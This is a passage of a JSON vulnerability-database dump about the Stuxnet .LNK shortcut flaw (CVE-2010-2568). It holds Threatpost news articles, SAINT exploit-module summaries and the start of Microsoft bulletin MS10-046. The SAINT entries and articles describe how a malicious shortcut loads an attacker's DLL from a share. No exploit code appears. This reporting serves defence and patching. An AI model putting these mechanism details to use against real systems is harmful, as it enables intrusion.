"CVE-2012-0158", "CVE-2014-2423"], "description": "One of the alleged mandates around the development of the Stuxnet worm was that malware\u2019s numerous components\u2014which included a handful of zero days\u2014should never escape the Natanz uranium enrichment facility in Iran. Eight years later, evidence continues to mount as to how that mandate was categorically not met.\n\nKaspersky Lab today released a [report](<https://securelist.com/analysis/publications/78125/exploits-how-great-is-the-threat/>) on exploits in the wild that indicates that endpoints are still running head-on into exploits for the since-patched [LNK vulnerability](<https://threatpost.com/key-stuxnet-lnk-spreading-mechanism-stops-working-062512/76730/>) ([CVE-2010-2568](<https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2568>)), almost two times more in 2016 than the next most prevalent exploit in circulation, Lotoor, which roots Android devices. In 2016, the Kaspersky report says, exploits for the LNK vulnerability (25 percent) and Lotoor (16 percent) account for 41 percent of exploits encountered by users. While these numbers are down from 2015 (27 percent and 11 percent respectively), the [LNK exploit](<https://securelist.com/blog/events/33206/the-day-the-stuxnet-died-27/>) appears to be hanging around for the foreseeable future.\n\n\u201cThis may be due to the fact that malware that uses these exploits have a self-replicating feature, constantly recreating themselves in the attacked network where vulnerable computers are installed,\u201d Kaspersky Lab said in its report.\n\nThe LNK exploit was just part of the Stuxnet attacks on Natanz, which targeted not only Windows machines running in the facility, but primarily Siemens programmable logic controllers managing centrifuges used to enrich uranium to support Iran\u2019s nuclear efforts. Exploits revolved around maliciously crafted .LNK files that were not processed securely as Windows Explorer icons were displayed. Successful exploits allowed the attackers to execute code in the Windows shell on vulnerable machines.\n\nLNK files define shortcuts to files or directories; Windows allows them to use custom icons from control panel files (.CPL). In Windows, those icons are loaded from modules, either executables or DLLs; CPLs are DLLs. An attacker is able to then define which executable module would be loaded, and use the .LNK file to execute arbitrary code inside of the Windows shell.\n\nWhile Microsoft quickly patched the vulnerability once it was disclosed in 2010, it was reported five years later that [the original patches were incomplete](<https://threatpost.com/patched-windows-machines-exposed-to-stuxnet-lnk-flaw-all-along/111558/>), forcing Microsoft to release an update bulletin with new patches.\n\nThe Kaspersky report, meanwhile, demonstrates the value of reliable exploits to attackers. Many of the exploits called out in the report are not flashy unpatched zero-days, but instead have some mileage on them. While [exploit kits dropped off](<https://threatpost.com/where-have-all-the-exploit-kits-gone/124241/>) the lists of top threats, venerable standbys such as CVE-2012-0158 in Office and CVE-2014-2423 in Java continue to draw the attention of exploit writers.\n\nThe widespread disappearance of exploit kits\u2014largely because of the [arrest of the criminals behind Angler](<https://threatpost.com/inside-the-demise-of-the-angler-exploit-kit/120222/>)\u2014has forced criminals to return to email-based attacks with macro-based malware buried inside Office attachments, now a top vehicle for malware delivery.\n\nFor example, attacks against browser and Windows vulnerabilities dropped 33.4 percent and 21.5 percent respectively from 2015 to 2016, Kaspersky said, while Office exploits rose 103 percent. While exploits against Adobe Flash and Android rose last year, Java and Adobe Reader exploits joined browsers and Windows on the negative side.\n\nKaspersky Lab said the number of browser vulnerabilities overall dropped 8 percent last year, while disclosed Office bugs went up 20 percent.\n\nOther noteworthy data points from the report include:\n\n * Kaspersky said it blocked 702 million attacks using an exploit in 2016, up 24 percent from 2015\n * Corporate users encountering attacks using exploits increased 28 percent\n * 70 percent of users encountered browser, Windows, Android or Office exploits\n * Russian-speaking APT Sofacy has used six zero-day exploits and 25 vulnerabilities overall; Equation Group has used eight zero days, and 17 vulnerabilities\n * 15 percent of computers in Europe and North America are still vulnerable to CVE-2012-0158\n", "modified": "2017-04-25T19:46:48", "published": "2017-04-20T12:15:46", "id": "THREATPOST:C6DD041BAAC1DCF6C44CCBD19C9F1F13", "href": "https://threatpost.com/stuxnet-lnk-exploits-still-widely-circulated/125089/", "type": "threatpost", "title": "Stuxnet LNK Exploits Still Widely Circulated", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:14", "bulletinFamily": "info", "cvelist": ["CVE-2010-2568", "CVE-2015-0072", "CVE-2017-11882"], "description": "Windows IT shops figure to be in for some scrambling today. Not only was it revealed that a five-year-old [patch for a vulnerability exploited by Stuxnet was incomplete](<https://threatpost.com/patched-windows-machines-exposed-to-stuxnet-lnk-flaw-all-along/111558>) and machines have been exposed since 2010, but today is also [Patch Tuesday](<https://technet.microsoft.com/library/security/ms15-mar>) and the updated Stuxnet patch is one of 14 bulletins released by Microsoft.\n\nFive of the bulletins are rated critical by Microsoft, and include another Internet Explorer rollup and a patch for the recently disclosed [FREAK attack](<https://threatpost.com/new-freak-attack-threatens-many-ssl-clients/111390>). Microsoft also released an advisory announcing that SHA-2 code signing support has been added to Windows 7 and Windows Server 2008 R2. Later versions of Windows desktop and server OSes already include support for SHA-2 signing and verification, Microsoft said.\n\nThe highest profile bulletin, however, is [MS15-020](<https://technet.microsoft.com/library/security/MS15-020>) which resolves some issues left behind by the original Stuxnet patch, CVE-2010-2568, released in August 2010. The bulletin covers two remote code execution vulnerabilities, one addressing how Windows handles loading of DLL files, and the other patches how Windows Text Services improperly handles objects in memory.\n\nThe DLL planting vulnerability was used by Stuxnet to attack the Iranian nuclear program in 2009. If a user viewed a folder or directory storing a malicious .LNK file, the exploit would allow the attacker to run code of their choice remotely.\n\nThe issue was reported to HP\u2019s Zero Day Initiative, which worked with Microsoft providing it with details and a proof of concept exploit that was used to build a new patch.\n\nThe IE bulletin, [MS15-018](<https://technet.microsoft.com/library/security/MS15-018>), addresses a number of memory corruption and elevation of privileges vulnerabilities in the browser.\n\n\u201cThe security update addresses the vulnerabilities by modifying the way that Internet Explorer handles objects in memory, by modifying how the VBScript scripting engine handles objects in memory, by helping to ensure that cross-domain policies are properly enforced in Internet Explorer, and by adding additional permission validations to Internet Explorer,\u201d Microsoft said in its advisory.\n\nThe vulnerability is rated critical for all client versions of IE going back to IE6, while it\u2019s rated moderate going back to IE6 on Windows Server.\n\nMicrosoft said that one of the elevation of privilege vulnerabilities has been publicly disclosed and exploited. Some details on CVE-2015-0072 were disclosed in early February by U.K. researcher David Leo of Deusen. The vulnerability, a [universal cross-site scripting (XSS) bug](<https://threatpost.com/xss-vulnerability-in-ie-could-lead-to-phishing-attacks/110854>), could be exploited to steal information or inject code into domains on the browser on Windows 7 and 8.1, he said.\n\nMicrosoft also patched a critical vulnerability in the Windows VBScript scripting engine that could lead to remote code execution. [MS15-019](<https://technet.microsoft.com/library/security/MS15-019>) patches the flaw, which can be exploited if a user is led to a website hosting an exploit. VBScript 5.8 in IE 8-11 are affected by the vulnerability, which exists in the way the VBScript engine, when rendered in IE, handles objects in memory.\n\nMicrosoft also patched critical remote code execution vulnerabilities in Office. The critical bugs in [MS15-022](<https://technet.microsoft.com/library/security/MS15-022>) lead to remote code execution and can be exploited via malicious Office documents. In addition to Office software, Sharepoint is also affected with a pair of cross-site scripting vulnerabilities.\n\nThe final critical bulletin is MS15-021, patches eight vulnerabilities in the Adobe Font Driver, four of them critical remote code execution bugs, along with less-severe information disclosure and denial of service vulnerabilities.\n\nThe critical RCE vulnerabilities are exploited over the web by taking advantage of a flaw in the way the driver improperly overwrites objects in memory. None of the vulnerabilities were publicly disclosed, nor have they been exploited in the wild.\n\nMicrosoft also released a bulletin addressing the [FREAK vulnerabilities](<https://threatpost.com/new-freak-attack-threatens-many-ssl-clients/111390>). [MS15-031](<https://technet.microsoft.com/library/security/MS15-031>) specifically patches the [security feature bypass vulnerability in Schannel](<https://threatpost.com/microsoft-warns-schannel-vulnerable-to-freak-attacks/111474>), the Windows implementation of SSL/TLS, that enables FREAK attacks. FREAK forces systems to downgrade the key length of an RSA key to a crackable 512 bits, enabling a man-in-the-middle attack putting supposedly encrypted traffic at risk.\n\nInitially, it was believe that FREAK was confined to certain SSL clients, including OpenSSL, but Microsoft released an advisory on March 5 warning about Schannel\u2019s exposure.\n\n\u201cThe security update addresses the vulnerability by correcting the cipher suite enforcement policies that are used when server keys are exchanged between servers and client systems,\u201d Microsoft said.\n\nOf the remaining bulletins, all of which are rated important by Microsoft, [MS15-027](<https://technet.microsoft.com/library/security/MS15-027>) merits attention. The bulletin patches a vulnerability in Windows Netlogon by modifying the way it handles secure channels.\n\n\u201cThe vulnerability could allow spoofing if an attacker who is logged on to a domain-joined system runs a specially crafted application that could establish a connection with other domain-joined systems as the impersonated user or system,\u201d Microsoft said in its advisory, adding that the severity is lessened because an attacker would have to be logged on to a domain-joined system and be able to observe network traffic.\n", "modified": "2015-03-13T19:53:47", "published": "2015-03-10T14:24:37", "id": "THREATPOST:519B278A52BA4200692386F6FAEA43B1", "href": "https://threatpost.com/microsoft-patches-old-stuxnet-bug-freak-vulnerability/111565/", "type": "threatpost", "title": "March 2015 Microsoft Patch Tuesday Security Bulletins", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:26", "bulletinFamily": "info", "cvelist": ["CVE-2010-2568", "CVE-2015-1769", "CVE-2017-11882"], "description": "It used to be that dropping a USB stick in a parking lot in the hope that someone plugs the malicious peripheral into an important computer was the realm of penetration testers and ambitious nation-state actors.\n\nThat\u2019s just not so anymore. The practice has gone mainstream, even infiltrating [popular hacker dramas](<http://www.imdb.com/title/tt4158110/>) on television.\n\nMicrosoft yesterday patched a vulnerability, [MS15-085](<https://technet.microsoft.com/library/security/ms15-085>), in Windows [Mount Manager](<https://msdn.microsoft.com/en-us/library/Aa940165%28v=WinEmbedded.5%29.aspx>), a driver in mountmgr.sys that assigns driver letters for dynamic and basic disk volumes. The flaw, Microsoft said, is being exploited in targeted attacks and [patching this vulnerability](<https://threatpost.com/microsoft-patches-critical-vulnerabilities-in-new-edge-browser/114226>) should be prioritized.\n\nMicrosoft rated the vulnerability (CVE-2015-1769) \u201cimportant\u201d because it requires local access to a machine to exploit. But that shouldn\u2019t diminish the importance of the vulnerability, experts said.\n\n\u201cEven in an otherwise locked down, unprivileged environments, this vulnerability can allow an attacker to run malicious code on a system if they can gain access to a USB port,\u201d said Bobby Kuzma, systems engineer at Core Security. \u201cThankfully, since this attack does require physical access to a system, it\u2019s impact is limited to specific environments and circumstances.\u201d\n\nThe most notorious instance of advanced attackers moving malware over USB drives is of course Stuxnet. Attackers used USBs to infect computers with the malware at the Natanz uranium enrichment facility in Iran; Stuxnet-infected machines spread the malware to USBs and other peripherals connected to the computer in the hopes of spreading the attack to air-gapped machines.\n\nThis vulnerability is different, said Craig Young, a security researcher with Tripwire.\n\n\u201cThis flaw allows someone with physical access to an unlocked machine to use the USB drive as an avenue to write files where the user normally could not,\u201d Young said. \u201cThis makes [elevation of privilege] easy since DLLs can be written to system locations and in general executables run as SYSTEM should be replaceable with attacker code.\u201d\n\nStuxnet exploited, among other vulnerabilities, a flaw in the Windows Shell that allowed local users and remote attackers to execute code using a [malicious .LNK shortcut file](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2568>). The vulnerability occurs because the .LNK files are not properly handled during icon display in Windows Explorer and in Siemens WinCC SCADA systems. The malware executes by merely visiting a directory hosting the .LNK file.\n\nThe .LNK vulnerability was also exploited by the Equation Group, uncovered by researchers at Kaspersky Lab, via the [Fanny worm](<https://threatpost.com/massive-decades-long-cyberespionage-framework-uncovered/111080>). Fanny exploits two zero days also used by Stuxnet and also spread over USB sticks to air-gapped computers.\n\nIn March, [Microsoft patched the .LNK-related vulnerability again](<https://threatpost.com/patched-windows-machines-exposed-to-stuxnet-lnk-flaw-all-along/111558>) after German researcher Michael Heerklotz discovered that the original patch from August 2010 was incomplete. Heerklotz reported the bug to HP\u2019s Zero Day Initiative, which said that Windows users had been exposed all along. Heerklotz said he found a way to [bypass Microsoft\u2019s patch by attacking other parts of the .LNK code](<https://threatpost.com/details-surface-on-stuxnet-patch-bypass/111579>) that was not checked by the original patch.\n\nThe Mount Manager vulnerability patched yesterday is not remotely exploitable. It does allow for elevation of privilege and affects supported Windows systems, including Windows 10.\n\n\u201cThis particular vulnerability is a great illustration of the security precept \u2018If I can touch your computer, it\u2019s not your computer anymore,'\u201d Kuzma said. \u201cIt\u2019s important for organizations to think about the physical security of their systems, and the access controls to prevent unauthorized users from gaining access to them. A review of policies and controls surrounding outside USB media might be a good idea.\u201d\n\nMicrosoft announced that in addition to the patch it was also making an event log available that detects attacks against this vulnerability.\n\n\u201cThe event log will be triggered every time a malicious USB that relies on this vulnerability, is mounted on the system. If such an event is recorded, it means that attempt to exploit the vulnerability is blocked,\u201d Microsoft said in a [blog post](<http://blogs.technet.com/b/srd/archive/2015/08/11/defending-against-cve-2015-1769-a-logical-issue-exploited-via-a-malicious-usb-stick.aspx>). \u201cSo once the update is installed, companies auditing event logs will be able to use this as detection mechanism. These events are logged under \u2018System\u2019 channel and is reported as an error.\u201d\n", "modified": "2015-08-13T18:37:32", "published": "2015-08-12T10:49:23", "id": "THREATPOST:FB6C6CE8F3B4AE6846C8AB866C36F024", "href": "https://threatpost.com/microsoft-patches-usb-related-flaw-used-in-targeted-attacks/114240/", "type": "threatpost", "title": "Microsoft Patches USB-Related Flaw Used in Targeted Attacks", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:13", "bulletinFamily": "info", "cvelist": ["CVE-2010-2568", "CVE-2015-0096", "CVE-2017-11882"], "description": "It took 10 hours to find what had eluded others for close to five years.\n\nGerman computer science student Michael Heerklotz spent the Christmas holiday reading _Countdown to Zero Day_, a narrative on the discovery and impact of Stuxnet, the computer worm considered one of the first cyberweapons, and which is accused of putting a serious dent in Iran\u2019s development of nuclear weaponry.\n\nThe book inspired the University of Augsburg student to examine Stuxnet, specifically [the .LNK vulnerability in the Windows shell](<https://threatpost.com/patched-windows-machines-exposed-to-stuxnet-lnk-flaw-all-along/111558>) that was exploited during the hack of the Natanz uranium enrichment facility.\n\nMicrosoft had patched the flaw in August 2010, and in the four-plus years since, no public reports of problems with the patch or residual effects from the vulnerability were ever heard. It was assumed that Windows machines that were patched against CVE-2010-2568 were in the clear.\n\n\u201cI wanted to take a closer look at the .LNK vulnerability by testing it on an old Windows XP installation, and then trying to figure out what Mircosoft did to fix it,\u201d Heerklotz said in an email to Threatpost. \u201cAmazingly, after about 10 hours, I found a way to bypass the fix, by abusing other parts of the .LNK code which Microsoft most likely did not check too carefully when they created the patch.\u201d\n\nHeerklotz reported in January what he\u2019d found to HP\u2019s Zero Day Initiative, a vulnerability disclosure program originally started by TippingPoint before it was acquired by HP. The program vets vulnerabilities, creates proof-of-concept code, and eventually shares its findings with the affected vendor while paying out a bounty to the researcher and giving its customers first dibs on a fix.\n\nYesterday, [HP disclosed intimate details](<http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBPd-G0CL2>) of what Heerklotz had discovered, hours after [Microsoft produced a patch that took care of the Stuxnet bug](<https://threatpost.com/microsoft-patches-old-stuxnet-bug-freak-vulnerability/111565>)\u2014again.\n\n\u201cIt was a bit tricky, but not too complicated, and it puzzles me that nobody discovered (and published) it earlier,\u201d Heerklotz said. \u201c[Other researchers have looked at the patch](<http://www.lexsi-leblog.com/cert-en/how-microsoft-fixed-the-lnk-vulnerability-and-other-things.html>), too, but I guess nobody invested too much time, because everything seemed to be OK.\u201d\n\nThe [.LNK vulnerability](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2568>) was part of Stuxnet\u2019s arsenal as it went after Iran\u2019s nuclear program with a barrage of zero-day exploits targeting Windows vulnerabilities, as well as shortcomings with Siemens programmable logic controllers (PLCs) in charge of centrifuge operations inside Natanz.\n\n\u201cThat patch didn\u2019t completely address the .LNK issue in the Windows shell, and there were weaknesses left behind that have been resolved in this patch,\u201d said Brian Gorenc, manager of vulnerability research with ZDI. Gorenc said the vulnerability works on Windows machines going back to Windows XP through Windows 8.1, and the proof of concept exploit developed by Heerklotz and tweaked by ZDI evades the validation checks put in place by the original Microsoft security bulletin.\n\nFrom a high level, Stuxnet was launched after a USB drive was inserted into an air-gapped machine at the facility that was loaded with an exploit for a Windows vulnerability that would execute when a user browsed a directory or folder containing the .LNK exploit, HP said.\n\n\u201cWindows allowed for .LNK files, which define shortcuts to other files or directories, to use custom icons from .CPL (Control Panel) files. The problem is that in Windows, icons are loaded from modules (either executables or dynamic link-libraries). In fact, .CPL files are actually DLLs,\u201d HP said in its advisory. \u201cBecause an attacker could define which executable module would be loaded, an attacker could use the .LNK file to execute arbitrary code inside of the Windows shell and do anything the current user could.\u201d\n\nMicrosoft\u2019s answer in the August 2010 patch was to whitelist which .CPL files could load non-standard icons for links.\n\nHP explains the bypass in detail in its [advisory](<http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBPd-G0CL2>), adding that for all of its necessary investments in memory corruption attack mitigations, Microsoft paid in this instance for a 10-year-old decision to load such shortcut icons by loading executable modules into the process.\n\n\u201cThe Windows operating system itself will handle resolving ASLR and loading the attack into executable memory. And because of that, the attack is stable, reliable, and works cleanly across Windows versions. Microsoft has gone to a great deal of effort to make exploitation of memory corruption bugs more difficult,\u201d HP said. \u201cThis is a classic example of the Defender\u2019s Dilemma \u2014 the defender must be strong everywhere, while the attacker needs to find only one mistake.\u201d\n", "modified": "2015-03-11T17:01:47", "published": "2015-03-11T13:01:47", "id": "THREATPOST:BB95F65906A69148A31A208D15B5EFC3", "href": "https://threatpost.com/details-surface-on-stuxnet-patch-bypass/111579/", "type": "threatpost", "title": "Details Surface on Stuxnet Patch Bypass", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2016-10-03T15:01:53", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2568"], "description": "Added: 07/22/2010 \nCVE: [CVE-2010-2568](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2568>) \nBID: [41732](<http://www.securityfocus.com/bid/41732>) \nOSVDB: [66387](<http://www.osvdb.org/66387>) \n\n\n### Background\n\nMicrosoft Windows supports LNK files, also known as shortcuts, which are references to other files. Shortcuts can be placed in a location which is convenient for users (such as the Desktop or Start menu), from which they can be used to execute the referenced file. \n\n### Problem\n\nA design weakness in the Windows shell allows command execution when a user opens a shortcut file containing a CONTROL item which specifies a malicious executable DLL. The shortcut file could be given to the user on removable media such as a USB flash drive. \n\n### Resolution\n\nSee [Microsoft Security Advisory 2286198](<http://www.microsoft.com/technet/security/advisory/2286198.mspx>) for patch information or workarounds. \n\n### References\n\n<http://www.kb.cert.org/vuls/id/940193> \n\n\n### Limitations\n\nThe specified SMB share must be accessible by the target user. Before the exploit can succeed, download the exploit.dll file and place it on the specified share. \n\nThe user must double-click on the shortcut file in order for this exploit to succeed. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2010-07-22T00:00:00", "published": "2010-07-22T00:00:00", "id": "SAINT:23F1F2BDDAAD19D660289BACF901A811", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/windows_shell_lnk_control", "type": "saint", "title": "Windows Shell LNK file CONTROL item command execution", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T17:19:45", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2568"], "edition": 2, "description": "Added: 07/22/2010 \nCVE: [CVE-2010-2568](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2568>) \nBID: [41732](<http://www.securityfocus.com/bid/41732>) \nOSVDB: [66387](<http://www.osvdb.org/66387>) \n\n\n### Background\n\nMicrosoft Windows supports LNK files, also known as shortcuts, which are references to other files. Shortcuts can be placed in a location which is convenient for users (such as the Desktop or Start menu), from which they can be used to execute the referenced file. \n\n### Problem\n\nA design weakness in the Windows shell allows command execution when a user opens a shortcut file containing a CONTROL item which specifies a malicious executable DLL. The shortcut file could be given to the user on removable media such as a USB flash drive. \n\n### Resolution\n\nSee [Microsoft Security Advisory 2286198](<http://www.microsoft.com/technet/security/advisory/2286198.mspx>) for patch information or workarounds. \n\n### References\n\n<http://www.kb.cert.org/vuls/id/940193> \n\n\n### Limitations\n\nThe specified SMB share must be accessible by the target user. Before the exploit can succeed, download the exploit.dll file and place it on the specified share. \n\nThe user must double-click on the shortcut file in order for this exploit to succeed. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2010-07-22T00:00:00", "published": "2010-07-22T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/windows_shell_lnk_control", "id": "SAINT:0083688CA07FA21D6F4D1102BD0550AB", "type": "saint", "title": "Windows Shell LNK file CONTROL item command execution", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:35", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2568"], "description": "Added: 07/22/2010 \nCVE: [CVE-2010-2568](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2568>) \nBID: [41732](<http://www.securityfocus.com/bid/41732>) \nOSVDB: [66387](<http://www.osvdb.org/66387>) \n\n\n### Background\n\nMicrosoft Windows supports LNK files, also known as shortcuts, which are references to other files. Shortcuts can be placed in a location which is convenient for users (such as the Desktop or Start menu), from which they can be used to execute the referenced file. \n\n### Problem\n\nA design weakness in the Windows shell allows command execution when a user opens a shortcut file containing a CONTROL item which specifies a malicious executable DLL. The shortcut file could be given to the user on removable media such as a USB flash drive. \n\n### Resolution\n\nSee [Microsoft Security Advisory 2286198](<http://www.microsoft.com/technet/security/advisory/2286198.mspx>) for patch information or workarounds. \n\n### References\n\n<http://www.kb.cert.org/vuls/id/940193> \n\n\n### Limitations\n\nThe specified SMB share must be accessible by the target user. Before the exploit can succeed, download the exploit.dll file and place it on the specified share. \n\nThe user must double-click on the shortcut file in order for this exploit to succeed. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2010-07-22T00:00:00", "published": "2010-07-22T00:00:00", "id": "SAINT:D73D956898E75970CBB67DF23C41B8A0", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/windows_shell_lnk_control", "title": "Windows Shell LNK file CONTROL item command execution", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:38", "bulletinFamily": "software", "cvelist": ["CVE-2010-2568"], "description": "Code execution on shortcut icon displaying.", "edition": 1, "modified": "2010-08-03T00:00:00", "published": "2010-08-03T00:00:00", "id": "SECURITYVULNS:VULN:11026", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11026", "title": "Microsoft Windows shortcuts code execution", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:36", "bulletinFamily": "software", "cvelist": ["CVE-2010-2568"], "description": "Microsoft Security Bulletin MS10-046 - Critical\r\nVulnerability in Windows Shell Could Allow Remote Code Execution &#40;2286198&#41;\r\nPublished: August 02, 2010\r\n\r\nVersion: 1.0\r\nGeneral Information\r\nExecutive Summary\r\n\r\nThis security update resolves a publicly disclosed vulnerability in Windows Shell. The vulnerability could allow remote code execution if the icon of a specially crafted shortcut is displayed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nThis security update is rated Critical for all supported editions of Microsoft Windows. For more information, see the subsection, Affected and Non-Affected Software, in this section.\r\n\r\nThe security update addresses the vulnerability by correcting validation of shortcut icon references. For more information about the vulnerability, see the Frequently Asked Questions &#40;FAQ&#41; subsection for the specific vulnerability entry under the next section, Vulnerability Information.\r\n\r\nThis security update addresses the vulnerability first described in Microsoft Security Advisory 2286198.\r\n\r\nRecommendation. The majority of customers have automatic updating enabled and will not need to take any action because this security update will be downloaded and installed automatically. Customers who have not enabled automatic updating need to check for updates and install this update manually. For information about specific configuration options in automatic updating, see Microsoft Knowledge Base Article 294871.\r\n\r\nFor administrators and enterprise installations, or end users who want to install this security update manually, Microsoft recommends that customers apply the update immediately using update management software, or by checking for updates using the Microsoft Update service.\r\n\r\nSee also the section, Detection and Deployment Tools and Guidance, later in this bulletin.\r\n\r\nKnown Issues. None\r\nTop of sectionTop of section\r\nAffected and Non-Affected Software\r\n\r\nThe following software have been tested to determine which versions or editions are affected. Other versions or editions are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, visit Microsoft Support Lifecycle.\r\n\r\nAffected Software\r\nOperating System\tMaximum Security Impact\tAggregate Severity Rating\tBulletins Replaced by this Update\r\n\r\nWindows XP Service Pack 3\r\n\t\r\n\r\nRemote Code execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nRemote Code execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2003 Service Pack 2\r\n\t\r\n\r\nRemote Code execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2003 x64 Edition Service Pack 2\r\n\t\r\n\r\nRemote Code execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2003 with SP2 for Itanium-based Systems\r\n\t\r\n\r\nRemote Code execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Vista Service Pack 1 and Windows Vista Service Pack 2\r\n\t\r\n\r\nRemote Code execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2\r\n\t\r\n\r\nRemote Code execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2*\r\n\t\r\n\r\nRemote Code execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2*\r\n\t\r\n\r\nRemote Code execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2\r\n\t\r\n\r\nRemote Code execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows 7 for 32-bit Systems\r\n\t\r\n\r\nRemote Code execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows 7 for x64-based Systems\r\n\t\r\n\r\nRemote Code execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 R2 for x64-based Systems*\r\n\t\r\n\r\nRemote Code execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 R2 for Itanium-based Systems\r\n\t\r\n\r\nRemote Code execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\n*Server Core installation affected. This update applies, with the same severity rating, to supported editions of Windows Server 2008 or Windows Server 2008 R2 as indicated, whether or not installed using the Server Core installation option. For more information on this installation option, see the TechNet articles, Managing a Server Core Installation and Servicing a Server Core Installation. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008 and Windows Server 2008 R2; see Compare Server Core Installation Options.\r\nTop of sectionTop of section\r\n\t\r\nFrequently Asked Questions &#40;FAQ&#41; Related to This Security Update\r\n\r\nWhere are the file information details? \r\nRefer to the reference tables in the Security Update Deployment section for the location of the file information details.\r\n\r\nHow are the Windows 7 Service Pack 1 Beta and Windows Server 2008 R2 Service Pack 1 Beta releases affected by this vulnerability? \r\nWindows 7 Service Pack 1 Beta and Windows Server 2008 R2 Service Pack 1 Beta are affected by the vulnerability described in this bulletin. Customers running these beta releases are encouraged to download and apply the update to their systems. Security updates are available from Microsoft Update and Windows Update. The security update is also available for download from the Microsoft Download Center.\r\n\r\nI am using an older release of the software discussed in this security bulletin. What should I do? \r\nThe affected software listed in this bulletin have been tested to determine which releases are affected. Other releases are past their support life cycle. For more information about the product lifecycle, visit the Microsoft Support Lifecycle Web site.\r\n\r\nIt should be a priority for customers who have older releases of the software to migrate to supported releases to prevent potential exposure to vulnerabilities. To determine the support lifecycle for your software release, see Select a Product for Lifecycle Information. For more information about service packs for these software releases, see Lifecycle Supported Service Packs.\r\n\r\nCustomers who require custom support for older software must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country in the Contact Information list, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Microsoft Support Lifecycle Policy FAQ.\r\nTop of sectionTop of section\r\nVulnerability Information\r\n\t\r\nSeverity Ratings and Vulnerability Identifiers\r\n\r\nThe following severity ratings assume the potential maximum impact of the vulnerability. For information regarding the likelihood, within 30 days of this security bulletin&#39;s release, of the exploitability of the vulnerability in relation to its severity rating and security impact, please see the Exploitability Index in the August bulletin summary. For more information, see Microsoft Exploitability Index.\r\nVulnerability Severity Rating and Maximum Security Impact by Affected Software\r\nAffected Software\tShortcut Icon Loading Vulnerability - 